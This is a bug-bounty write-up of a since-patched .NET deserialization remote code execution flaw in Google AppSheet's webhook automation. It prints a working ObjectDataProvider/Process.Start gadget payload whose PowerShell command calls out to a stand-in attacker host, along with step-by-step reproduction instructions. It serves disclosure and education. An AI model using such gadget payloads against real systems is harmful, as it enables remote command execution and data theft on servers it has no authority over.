🎬 Introduction β€” No-Code, Full Access

Google's AppSheet is a no-code platform that powers thousands of business workflows. But in September 2022, one automation feature turned into a remote control for Google's own servers.

Security researcher Chip uncovered a Deserialization Remote Code Execution (RCE) vulnerability that allowed arbitrary PowerShell command execution on the backend.

The result? πŸ’° $10,000 bounty 🚨 Critical vulnerability fixed before abuse 🌍 Millions of users protected

None
reward poc

🧩 What is Deserialization RCE?

Serialization = Packing an object for storage or transfer Deserialization = Unpacking the object back into memory

If a system blindly trusts and executes whatever comes in during deserialization, attackers can send malicious objects that run commands.

In .NET, this can be abused to:

  • Instantiate dangerous classes (System.Diagnostics.Process)
  • Invoke methods (Start)
  • Run shell commands (cmd, powershell)

πŸ” How the Vulnerability Was Found

The Automation feature in AppSheet allows:

  1. Creating a Bot to run on a schedule (e.g., monthly)
  2. Adding a Webhook Step to call any URL via HTTP POST
  3. Supplying Custom JSON Body

Chip discovered that this custom body data was deserialized without validation, making it possible to pass arbitrary .NET object types with method calls.

πŸ’» Malicious Payload Example

{
  "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName": "Start",
  "MethodParameters": {
    "$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "$values": [
      "cmd",
      "/c powershell -command \"Invoke-WebRequest -URI http://attacker-server.com\""
    ]
  },
  "ObjectInstance": {
    "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
  }
}

πŸ“Œ What it does:

  • ObjectDataProvider dynamically calls Start
  • Process spawns a new system process
  • PowerShell sends a web request to the attacker's server (proof of code execution)
None
Attack Chain Illustratio

πŸ›  Step-by-Step Reproduction (Educational Purpose Only)

⚠ Disclaimer: These steps are for educational & responsible disclosure purposes only. Running this on unauthorized systems is illegal.

Step 1: Create an AppSheet account and go to Automation Step 2: Add a New Bot and set it to run on a schedule (e.g., Monthly) Step 3: Add a Step β†’ Call a Webhook Step 4: Set Method = POST, URL = any test server you control (e.g., http://your-server.com) Step 5: In the Body, paste the malicious payload above (change your-server.com to your domain) Step 6: Save and wait for the bot to run Step 7: Check your server logs β†’ You'll see a request from Google's AppSheet infrastructure

πŸ“Š Attack Chain Flow

[Attacker] 
   β”‚
   β–Ό
[AppSheet Automation Bot]
   β”‚  (POST with malicious .NET object)
   β–Ό
[Unsafe Deserialization in Backend]
   β”‚
   β–Ό
[System.Diagnostics.Process.Start()]
   β”‚
   β–Ό
[PowerShell Command Execution]
   β”‚
   β–Ό
[Attacker's Server Receives Callback]

🎯 Impact if Exploited by an Attacker

  • Execute arbitrary commands on Google's servers
  • Steal sensitive enterprise data from AppSheet-hosted apps
  • Deploy malware or ransomware in Google's infrastructure
  • Pivot into Google Cloud Platform internal services

πŸ“… Timeline

  • Sep 19, 2022: Vulnerability reported to Google VRP
  • Sep 19, 2022: Triaged same day
  • Sep 28, 2022: Accepted
  • Oct 31, 2022: Patched
  • Bounty Awarded: $10,000

πŸ›‘ Google's Fix

  • Enforced type whitelisting in deserialization
  • Sanitized automation payloads
  • Prevented automation from spawning system processes

πŸ“š Lessons for Developers

  • Never deserialize untrusted data
  • Use safe serialization formats (JSON without polymorphic type binding)
  • Apply input validation for automation/custom workflows
  • Log & monitor outbound requests from backend processes

πŸ† Lessons for Bug Hunters

  • Explore automation & customization features β€” often overlooked
  • Test for server-side parsing of client-controlled input
  • In .NET apps, always check for object injection in JSON/XML
  • Chain with SSRF, RCE, or privilege escalation for higher impact

πŸš€ Conclusion

This bug shows that no-code β‰  no-risk. A single deserialization flaw turned a harmless automation bot into a remote control for Google's servers.

Thanks to responsible disclosure, Chip turned this potential global security threat into a $10,000 success story β€” proving that curiosity and ethics pay.

πŸ“’ Written by Aditya Sunny Yeswehack

InfoSec Write-ups

(@adityasunny06) β€” cybersecurity researcher, ethical hacker,Cybersecurity Enthusiast | Honoured by Bajaj Finance Security Heroes | Secured Meta (FB, IG, WA), Dell, Maffashion & more | Ex-Navodayan | Bug Hunter InfoSec Write-ups Sai Krishna Kothapalli Yeswehack

πŸ“Œ SEO Tags

Google AppSheet RCE Deserialization Vulnerability Remote Code Execution Bug Bounty Google VRP Report No-Code Security Flaw Ethical Hacking Case Study Bug Bounty 2025